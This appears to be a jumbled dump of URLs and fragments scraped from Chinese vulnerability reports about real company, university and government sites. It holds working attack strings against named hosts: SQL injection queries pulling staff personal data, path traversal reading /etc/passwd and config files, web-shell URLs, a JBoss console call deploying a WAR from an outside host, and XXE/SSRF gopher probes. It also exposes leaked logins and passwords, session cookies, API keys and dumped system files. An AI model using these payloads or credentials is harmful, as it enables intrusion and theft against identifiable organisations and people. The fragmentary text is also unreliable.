http://**.**.**.**/keshi.php?ks=%E5%8A%9E%E5%85%AC%E5%AE%A4 http://42.62.53.93/is/cmd.jsp?pwd=023&cmd=uname http://**.**.**.**:8080/view.asp?id=209 http://mba.tju.edu.cn/ C18D7B29143B2AEDFFE04A92F17784FC:FG=1 http://gugong.228.com.cn/ https://**.**.**.**/ http://**.**.**.**:8080/web/ConfigDivServ.jsp?op=showModify&uid=%bf http://**.**.**.**:8080/web/web_login_detail.jsp http://**.**.**.**:8080//web/log_bus_list.jsp?userno=-1 http://yingzhang.izuche.com:8087/CustomersJson.asmx/GetVerifyCheckCode com:8087 http://huifen.htd.cn http://**.**.**.** http://**.**.**.**/govop/Detailed.aspx?itemid=7512 www.sugon.com http://admin.heitao.com http://stat.wanglibao.com:10000/applog/push.php com:10000 
http://hy.ceair.com/web.rar http://**.**.**.**/default.asp http://**.**.**.**/list_crt.asp?id=15 http://oa.sugon.com/home/Produce/WeboaConfig.nsf/HomeForm?openform&login http://info.315.com.cn/ex/ex_talk_list.jsp?idn=-1 http://www.changhong.com.cn/ http://www.changhong.com.cn/wap/ http://www.changhong.com.cn/ProductCtl-list.do?ptype=2 http://**.**.**.** http://**.**.**.**/Company.asp?id=7 http://**.**.**.**/pzhi.asp?id=48 http://**.**.**.**/Service.asp?id=38 http://**.**.**.**/Marketing.asp?id=13 http://**.**.**.**/Job.asp?id=20 http://**.**.**.**/Contact.asp?id=25 http://**.**.**.**/Company.asp?id=7 http://passport.ccidnet.com/passport/passport?accountName=&action=17&email=sample%40email.tst&oprate=chkEmail http://**.**.**.**/c.html http://**.**.**.**/infolist.asp?big=%B2%BF%C3%C5%B8%C5%BF%F6 http://27.115.81.152:8080/ http://www.daoyoudao.com/dyd/city_getCitys.do?provincename=%25E6%25BE%25B3%25E9%2597%25A8%25E5%25B8%2582 http://static.daoyoudao.com http://**.**.**.**:9080/grm/ecosphere/portal/index.html http://**.**.**.**/api/front/news/listfirst?classId=83 http://m.e-bridge.com.cn/login.jsp http://www.gzxijiu.cn/phpmyadmin http://**.**.**.**/yyoa/ http://oa.moonbasa.com/seeyon/index.jsp致远A8的OA存在后门的哦 http://oa.moonbasa.com/seeyon/logs/login.log url:http://bzh.cnooc.com.cn/ http://bzh.cnooc.com.cn//Esst.Web.Login/CheckLoginState.aspx?User=admin*&Pwd=admin http://**.**.**.**:7001/存在“Java http://m.hc360.com/login.html这个接口是手机端登录接口,可以看到登录位置有验证码但是验证码可以绕过的 user:yzjtj,pass:yzjtj359 user:lygjtj,pass:lygjtj361 user:tzjtj,pass:tzjtj362 user:sqjtj,pass:sqjtj363 user:ntjtj,pass:ntjtj358 http://jf.crcxf.com:8001/Service/EmployDetaile.aspx?Id= http://bcs.baidu.com http://gs1.dlut.edu.cn/Supervisor/Front/dsxx/new/Default.aspx?WebPageName=zhuchungan&SpecialityID= http://xiaoshe.cnhubei.com/login.asp http://xiaoshe.cnhubei.com/attachments/month_1601/5.asp http://**.**.**.**/includes http://**.**.**.**/includes/payments/alipay/lib/logs/2015-12-15.log http://**.**.**.**/ 
http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/js/jquery-1.4.2.min.js/%20\0.php http://**.**.**.**/js/jquery-1.4.2.min.js/a.php http://**.**.**.**/jcydhd/jcydhd.rar http://**.**.**.**/default.rar http://**.**.**.**/zzb/Detail.asp?bigId=1 http://**.**.**.**/zzb/Detail.asp?bigId=3 http://**.**.**.**/zzb/Detail.asp?bigId=3 http://**.**.**.**/ http://**.**.**.**/index.do http://**.**.**.**/crn-webapp/zpykpub/left.jsp?mgzno=214 http://big5.ftchinese.com/这个是ft中文网的一个分站,登录的地方没有验证码限制也没有其他登录限制 http://ia-lab.dlut.edu.cn/cn/detail.asp?id=38 http://mpa.dlut.edu.cn/TeacherDetail.aspx?tid=11 http://**.**.**.**/bbs/uc_server/ http://sbs.m.sogou.com index.php/site/login http://www.junlebaoruye.com/ http://www.jlbry.com/ http://mail.jlbry.com/ http://lom.zqgame.com/getGiftCode?callback=jQuery1720561785590602085_1452288272132&type=-1 url:sqlmap http://**.**.**.**:8080/jmw/njjmw/info/policydetail;jsessionid=9A8EB815F87A86709131C532BF73114C?id=20150520092051443* http://td2.zqgame.com/interaction/list/page/1/6/type/flash*.html http://**.**.**.**/login http://202.108.145.195/ http://202.108.145.195/login/ http://202.108.145.195/backend/ http://lib.wap.zol.com.cn/bbs/my/myCollection.php?userid=itwgiv&vs=and412&imei=A0000000000000 http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2 http://school.51taoshi.com/study/index/classRoomForAnquan.action?search.field02=-1 http://**.**.**.**/ http://**.**.**.**/danpian/danpian.aspx?id=11328 http://life.cqu.edu.cn//chinese/search/index.php?search=1 http://www.jinmi8.com/u/getpwd1.html http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=39 http://**.**.**.**//messager/users.data http://**.**.**.**/news.asp?nb=2 
http://api.xianguo.com/i/status/get.json?key=36d979af3f6cecd87b89720d3284d420 http://www.swshb.com/admin/ http://14.152.92.89/admin/ http://**.**.**.**/list_xhjs.php?colid=23 http://**.**.**.**/new2014/temp/list_dljz.php?colid=17 http://yjsh.cqu.edu.cn/admin/ http://yjsh.cqu.edu.cn/admin/UI/Pages/Sys/OpterEdit.aspx?OpterId=6 http://yjsh.cqu.edu.cn/admin/Scripts//fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder http://**.**.**.**/index.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin 
apache:x:48:48:Apache:/var/www:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:492:Dovecot's user:/usr/libexec/dovecot:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin revo:x:500:500::/home/revo:/bin/bash http://security.neusoft.com:7080/media/login.htm http://220.248.118.29/ http://220.248.118.29/Booking/ http://220.248.118.29/EhiApiDocument/namespaces.html http://220.248.118.29/PortalsAdmin/ http://220.248.118.29/ChargeAccount2/Login.aspx http://220.248.118.29/Html/EhiShare/CMS/login.html http://220.248.118.29/chexiangOA/ http://220.248.118.29/Html/EhiShare/CMS/car_information.html#### http://220.248.118.29/Html/EhiShare/CMS/template.html#### http://220.248.118.29/ChargeAccount2/Login.aspx http://220.248.118.29/ChargeAccount2/AccountRequestCard.aspx http://220.248.118.29/ChargeAccount2/AccountRequestInvoice.aspx http://220.248.118.29/ChargeAccount2/AccountRequestPay.aspx http://220.248.118.29/ChargeAccount2/AccountRequestVerify.aspx http://220.248.118.29/ChargeAccount2/Refund.aspx http://220.248.118.29/Html/EhiChauffeur/step1_user.html http://220.248.118.29/Html/EhiChauffeur/orderList.html http://220.248.118.29/Html/MyEhi/2_information.html#### http://220.248.118.29/Html/Other/contract/contract.html http://train.51taoshi.com/teacher/fore/yxprolist.action?keywords=&ptid=yichang&xdid=&xkid=&yearid= http://**.**.**.**/ system:type=ServerInfo http://**.**.**.** http://**.**.**.**/checkweb/ http://xlcp.xgc.nchu.edu.cn/psy/login.aspx http://**.**.**.**/search.aspx?key=1 http://jingang.yto56.com.cn/exptrack/main.action http://kfhz.daoyoudao.com/firstPage/city_getCitys.do?provincename=%25E6%25BE%25B3%25E9%2597%25A8%25E5%25B8%2582 http://**.**.**.**/ http://**.**.**.**/e/member/cp/ http://mail.998.com/ http://www.shiyanbar.com/questions/detail/tag/15 display:none display:red 
http://www.shiyanbar.com/questions/detail/tag/47 http://**.**.**.**/syzx/jskbcx.asp?id=258 http://partner.daoyoudao.com http://**.**.**.**/eKaoQin/admin/login.jsp http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:7001/gx-eams/NetService/ExternService/Apply/CompExam/Apply_CompExamSign_selectExam.jsp?isNewSign=true http://**.**.**.**/ http://havboss.vcomlive.com/login?null https://github.com/chengtalent/SpringDemo/blob/1fae7c734120357d7e0b8ee2d0b3b28275145206/build.gradle http://archiva.dianrong.com/repository/mirror http://archiva.dianrong.com/repository/internal http://archiva.dianrong.com/repository/snapshots http://archiva.dianrong.com/ https://mail.aimatech.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.aimatech.com%2fowa%2f http://op.mobage.cn http://www.sfs.nju.edu.cn/show.php?catid=36&id=11 http://philo.nju.edu.cn/show.php?catid=16&id=38 http://**.**.**.**/bug.php?action=view&id=137850 https://code.google.com/u/104096235605441642429/ http://wooyun.org/bugs/wooyun-2015-0159345 http://m.xiu.com/myxiu/retrieve_phone.html http://m.xiu.com/myxiu/retrieve_phone.html(新的) http://m.xiu.com/myxiu/retrieve_password.html(旧的) http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/website.rar https://www.dowedo.com.cn http://www.neusoftcase.com http://www.einfo.net.cn/ http://**.**.**.**/showpage.php?number=11257存在注入漏洞 http://www.kugou.com/www.kugou.com.tar.gz http://**.**.**.**/?r=about%2Findex&catalog_id=126 http://**.**.**.**/index.php?r=about%2Findex&catalog_id=126 http://consultant.eapchina.net http://www.haoshouwang.com/mycenter/oldinnewinfo?id=138 
http://14.152.92.85/admin http://14.152.92.85/admin/adminLogin.action http://58.22.63.249 http://www.kaiyuanhotels.com BEF256C490D9A21B426BE52DFF3E1B60:FG=1 www.kaiyuanhotels.com http://ecases.medlive.cn/forum/topic_list.php?group_id=20000103&topic_type=5 http://**.**.**.**/rss.php?author=kacc_123 http://202.96.191.192 http://**.**.**.**:9091/index_new.asp?k=1&k_id=10&k_word=news&id=444中id参数存在sql注入 http://**.**.**.**:9091/upload_file.asp?keyno=0&pic=0&tablename=visainfo存在一个上传点 http://**.**.**.**:223/login.action?backURL=http%3A%2F%2F**.**.**.**%3A223%2Findex.action pwd:123456 http://**.**.**.**/upload_file.asp?keyno=0&pic=0&tablename=visainfo存在上传点 http://**.**.**.**/20160110.asp上传小马 http://**.**.**.**/2016wooyun.asp http://www.lecoudai.com/index.action encap:Ethernet addr:10.171.113.239 Bcast:10.171.119.255 Mask:255.255.248.0 MTU:1500 packets:5253551 packets:896113 txqueuelen:1000 http://**.**.**.**/index.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin 
postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin casweb:x:500:500::/home/casweb:/sbin/nologin http://**.**.**.**/ http://jkys.cjn.cn/index.php?m=admin&c=index&a=login&pc_hash=G64K4a http://**.**.**.**/ http://register.ccidnet.com http://**.**.**.**:8888/wap/MasterPage.aspx http://222.73.63.161/index.php?rptid=152 http://www.boyaa.com www.boyaa.com http://**.**.**.**/mod/login.action http://**.**.**.** http://cg.suning.com/server-status http://hs.suning.com/server-status http://dj.suning.com/server-status http://wifi.suning.com/server-status http://oma.suning.com/server-status http://trade.suning.com/server-status http://mas.suning.com/server-status http://dls.suning.com/server-status http://fx.suning.com/server-status http://**.**.**.**/ http://221.192.235.83:3580/ http://221.192.235.83:8082 http://**.**.**.**/ http://android.kkfun.com http://e-learning.lenovo.com.cn/user/registration/index/ https://account.bilibili.com/login?sns=weibo http://login.weibo.cn/中生成的,有一定的时效性,后端会校验是否合法,因此我们需要动态生成登录的表单。我写了一个简单的flask接口,在服务端请求后提取出来生成表单,然后前端自动提交即可完成登录。 http://**.**.**.**/main/message/index_ins.php?ms_id=2164 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-0122523 http://**.**.**.**/GetStuCheckinInfo http://**.**.**.**/db/index.php http://**.**.**.**/db/index.php?lang=zh-gb2312&co http://**.**.**.** http://**.**.**.**/ http://**.**.**.**:8080/ http://**.**.**.** http://**.**.**.**/index.php/shsj/Article/article?id=1488&furl=&fname= http://**.**.**.**/ http://**.**.**.**/site/about_us/title31_c/index.php?Company_SN=19560 http://**.**.**.**/)的文明创建动态管理系统 http://**.**.**.**:9080/imageFiles/ http://**.**.**.**/ http://**.**.**.**/study/modules.php?name=News&file=print&sid=84 
http://api.g.sdo.com/game/getBannerList?netFlag=WIFI&v=2.0&os=1&type=2&ticket=RNK76Qw9Qh%2B6P8NLIJY3bLD6crjjLrXO1710%2FTAQ%2Bq4pcCtcTVI8YCF3MH7MDRerW92hm%2FNxfg5piqpYykwUxowVll%2FvBQSEE8dde8gyvDqnbwha8rObtfnuUXLtm71FAsrYbTbWiCKITRvlz5JnVcLkGJnZ%2F8oVtZ64yU02C2w%3D&sequence=25&version=a.6.0.0 url:http://**.**.**.**:5225/cjgsfxt/login.action http://**.**.**.** http://**.**.**.** POST:http://**.**.**.**./was40/search http://**.**.**.**/info_news_detail.asp?id=74 http://**.**.**.**:8880/ http://www.xm968890.com:8008/ http://www.xyz.cn/ http://**.**.**.**/group/index.htm https://mail.**.**.**.**/ http://**.**.**.**/en/news_details.php?id=25 http://**.**.**.**/sc/news_details.php?id=7 http://**.**.**.**/tc/news_details.php?id=13 http://dayi.51taoshi.com http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**:81 http://**.**.**.**:81 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/chinese/02_about/download.php?f=../index.php 
http://**.**.**.**/chinese/02_about/download.php?f=../include/php_script/common.php http://**.**.**.**/ http://**.**.**.**/XSJCXX/FDY/XSJCXX_FDY_XS_LIST_XX.aspx?Zj=111122726 http://**.**.**.**/XSJCXX/FDY/XSJCXX_FDY_XS_LIST_XX.aspx?Zj=111122726 com:9000 http://222.73.63.161/ http://222.73.33.164:9000//jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service%3DMainDeployer&methodIndex=17&arg0=http://p2j.cn/is.war http://222.73.33.164:9000/ic/1.jsp http://222.73.33.164:9000/is/cmd.jsp http://**.**.**.** http://**.**.**.**/cn/download.php?f=/cn/index.php http://**.**.**.**/cn/download.php?f=/cn/info.php http://**.**.**.**/cn/download.php?f=/../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash man:x:13:62:Manual viewer:/var/cache/man:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash D-Bus:/var/run/dbus:/bin/false daemon:/var/lib/sshd:/bin/false usbmux:x:102:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologin ntp:x:74:104:NTP daemon:/var/lib/ntp:/bin/false statd:x:103:65534:NFS daemon:/var/lib/nfs:/sbin/nologin nullmail:x:104:105::/var/lock/svc/nullmailer:/bin/true mysql:x:60:106:MySQL admin:/var/lib/mysql:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false polkitd:x:499:498:User polkitd:/var/lib/polkit:/sbin/nologin http://**.**.**.**/tjrtvu.rar http://**.**.**.**/admin/Admin_Index.asp http://**.**.**.**/custom/jqgt/GroupNewsList.aspx?GroupId=130 https://113.29.38.71/用工具一测试就知道了 http://**.**.**.**:8087/module/listMess.action?page=1&rows=20&sort=createTime&order=desc,抓包: http://222.73.33.187:9000 
http://222.73.33.188:9000 http://222.73.33.190:9000 system:service%3DMainDeployer&methodIndex=17&arg0=http://p2j.cn/is.war http://b2b.htd.cn/invoker/JMXInvokerServlet http://msc.fdsm.fudan.edu.cn http://msc.fdsm.fudan.edu.cn/phpmyadmin/index.php http://logistics.fudan.edu.cn/ http://ddim.fdsm.fudan.edu.cn/ http://newsletter.fdsm.fudan.edu.cn/ http://www.fc.fudan.edu.cn http://www.fc.fudan.edu.cn/administrator/ http://www.flcds.fudan.edu.cn http://www.flcds.fudan.edu.cn/admin/login.aspx http://nano-dds.fudan.edu.cn http://nano-dds.fudan.edu.cn/file.aspx http://**.**.**.**/govaffairs/ReplyHPage/Browse.aspx?id=TW201110311212407224 http://**.**.**.**/myDOP/SCENE/TIDBITS/tidbits.php?myfichier=ProfGuh&monid=1 http://**.**.**.**/TkuEEWebLog/Members/leader.php?page=1&tid=15 http://wooyun.org/bugs/wooyun-2015-0165926 http://support.daw.so/admin.php http://qa.daw.so http://**.**.**.**/flow.php?step=calculate_cart_goods_total&rec_id=1 http://**.**.**.** http://**.**.**.**/index.php?prog=download_file&file_link=./index.php&file_name=index.php http://**.**.**.**/index.php?prog=download_file&file_link=./include/config.inc.php&file_name=config.inc.php http://www.amigo.cn/ami_stat/ami_stat.php?val2=undefined&val1=111*&type=search http://www.xyz.cn/special/app.html http://222.73.243.217/ http://vsimu.au.tsinghua.edu.cn/vsimu/oa/vsimu_blockmore.php?id=2&item_id=1437647282 http://cd.5i5j.com/regLogin/register http://cd.5i5j.com/regLogin/change http://cd.5i5j.com/userCenter/userInfo(个人资料) http://lennyxss.sinaapp.com/3SUMMN?1452480920 http://youxue.huatu.com/manage/index.php http://youxue.huatu.com/data/safe/pass.php http://youxue.huatu.com/data/enums/V.php http://oa.sino-tcm.com/yyoa/ http://oa.sino-tcm.com/yyoa/common/js/menu/test.jsp?doType=101&S1= http://oa.sino-tcm.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20USERNAME,TRUENAME,HANDPHONE,EMAIL2,BIRTHDAY,stuff_id,SYS_ID%20from%20person%20limit%2010 http://oa.sino-tcm.com/yyoa/welcome.jsp 
http://www.weixinyunduan.com/wx/wdyok-92245.html http://**.**.**.**/bugs/wooyun-2010-0131072 http://**.**.**.**/成功 http://**.**.**.**/ch/about/3717.html http://**.**.**.**/ch/about/3717*.html http://**.**.**.**/modules.php?page=%E8%A1%8C%E6%94%BF%E4%BA%BA%E5%93%A1&sidemenubar=2,2 http://wx.crc-gas.com/admin/Main/UserIndex http://wx.crc-gas.com/admin/Main/PayOrderIndex http://wx.crc-gas.com/admin/Main/ImgTxtList http://**.**.**.**:8090/sms/opac/search/showSearch.action http://**.**.**.**:8080/phpinfo.php http://**.**.**.**/main/YyxtQuestions.jsp?xtfl=05 http://**.**.**.**:88/SurveyDesign/share/webside/FindPassword.aspx http://wooyun.org/bugs/wooyun-2016-0168457 http://robotim.vmall.com/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://**.**.**.**/cn/index.jsp?m=newslist&cal=2 http://203.130.46.104:23458/index http://203.130.46.104:55070/logs/大量日志文件泄露 http://123.103.17.244:85/ http://125.210.191.39/home?width=1366&height=768 http://live.pchouse.com.cn/web.zip http://**.**.**.**/modules-Eng.php?page=IntroductionEng http://bbs.dji.com/forum.php?mod=viewthread&tid=39301&page=1&extra=#pid419511 http://wap.izuche.com/ http://wap.izuche.com/user/MyOrderPay.aspx?MainOrderID=129307 http://wap.izuche.com/user/MyOrderDetails.aspx?MainOrderID=129307 http://wap.izuche.com/user/MyOrderDetails.aspx?MainOrderID=129306 http://live800.wan.renren.com/live800/services/IVerification?wsdl http://ams.dhgate.com http://wooyun.org/bugs/wooyun-2016-0168457 http://chat.kefu.xoyo.com/live800//services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://**.**.**.**/Admin/ http://**.**.**.**/cms/special/specialurl.aspx?Id=9&type=formal www.izuche.com http://wap.izuche.com/user/MyInfo.aspx http://**.**.**.**/ http://gwh.tcl.com/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/map.aspx?keycode=*&wangdianid=2 www.kumayi.com 
http://180.153.27.4:8888/new/route/route_schedule.jsp?u&u=1&q_routeid=42771 https://222.128.5.208/ http://222.128.5.208:5678/manager/html http://222.128.5.208:10001/manager/html http://**.**.**.** http://yaoshi.sdo.com/fk/yaoshi/setting/set?KeyValueList=%7B%22pushloginswitch%22%3A%221%22%7D&netFlag=WIFI&sequence=282&ticket=RNK76Qw9Qh9ER4Ql/V/jOpq88wLfr/ZRTzqXKEfkZ9IxZe5JOrzJi52VsELTh05Z3L7a1YqtJK/GCuheFeWg1rkvuridVbe9J5P81PegQGb%2Bq5yO2tKFOHuZ9TqDAAtzGRpa2adsk9plr4iXospvfKpsPzZc99UDdJ%2BSC5G9bODN5UjiaLpdHQ%3D%3D&version=a.6.0.0 http://wooyun.org/bugs/wooyun-2016-0168457 http://live800.gffunds.com.cn/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://wen.daojia.com/ http://eqingfen.sz.tsinghua.edu.cn/remark.php?doc_id=2069 http://**.**.**.** http://**.**.**.** http://**.**.**.**/eng/download.php?file=/eng/download.php http://**.**.**.**/eng/download.php?file=/include/config.php http://**.**.**.**/ http://**.**.**.**/NewsPaper.aspx?NewsMagaID=4FBC611442E24383AAC7A89B1DAA550D http://**.**.**.**/Disnote.aspx?id=e2fcb675-cb62-49e8-8a13-89cba78e486a http://wooyun.org/bugs/wooyun-2016-0168457 http://online-service.deppon.com/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://zjc.ncu.edu.cn/jy/ https://cas.ncu.edu.cn:8443/cas/login http://oa.ncu.edu.cn/domcfg.nsf/loginforsso.fm?readform&ticket=001025&service=http%3A%2F%2Foa.ncu.edu.cn%2Fkeryec%2Findex.nsf%2FLocation1.ag%3Fopenagent%26ModKey%3DPersonalWork%26DBID%3DMail,枚举ticket这个参数可以看其他老师的邮件,好酸爽啊。 http://club.zerone.me/space.php?uid=14208&do=blog&id=69562 http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://chat.kefu.xoyo.com/live800/services/IVerification?wsdl http://zxkf.efunds.com.cn/live800/services/IVerification?wsdl http://**.**.**.** http://wooyun.org/bugs/wooyun-2016-0168457 http://im.changyou.com/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a 
http://ip:port/1.xml http://ip:port/1.xml http://wooyun.org/bugs/wooyun-2016-0168457 http://chat800.mia.com/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://**.**.**.**/tabc/ http://**.**.**.**/axis2/ http://idk.yingxiong.com/ http://wooyun.org/bugs/wooyun-2016-0168457 http://webchat.ruijie.com.cn//live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://www.chinanetwork.com.cn/w8/Knowledge/GetSideBarData?para=-1 http://222.73.243.217/ http://**.**.**.**/ibub/liuxue/?menuid=13&mainid=1&elsetype=6 http://oa.daojia.58.com/seeyon/main.do?method=main http://**.**.**.**/index.php?m=content&c=index&a=lists&catid=22&jg=0-8 http://59.cn/service/serLogin/w_service_chkLogin.asp?action=chklogin&auser=1 http://**.**.**.**:1723/yyoa/ http://www.gzxijiu.cn:8080/yyoa/ http://**.**.**.**/bugs/wooyun-2016-0168457 http://**.**.**.**//live800/services/IVerification?wsdl http://video.e23.cn/zhuanji/view.shtm?ZhuanjiID=120 http://live-i.meizu.com/live800/services/IVerification?wsdl file:///etc/hosts gopher://host:port/%a http://**.**.**.**/sionline/ http://**.**.**.**&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://care.amwaynet.com.cn/live800/services/IVerification?wsdl http://wooyun.org/bugs/wooyun-2014-074069 http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://116.228.151.48:48080/ http://116.228.151.48:48080/f.jsp http://**.**.**.**/ http://info.315.com.cn/info_count.jsp?idn=-1 www.ximalaya.com/upload http://61.163.78.6:8080/yyoa/ http://**.**.**.**/pollutequery.asp?ID=WEB201512110851490022-00 http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://onlineservice.xiamenair.com/live800/services/IVerification?wsdl http://**.**.**.**/**.**.**.**.zip http://www.wenji99.com:80/.svn/entries 
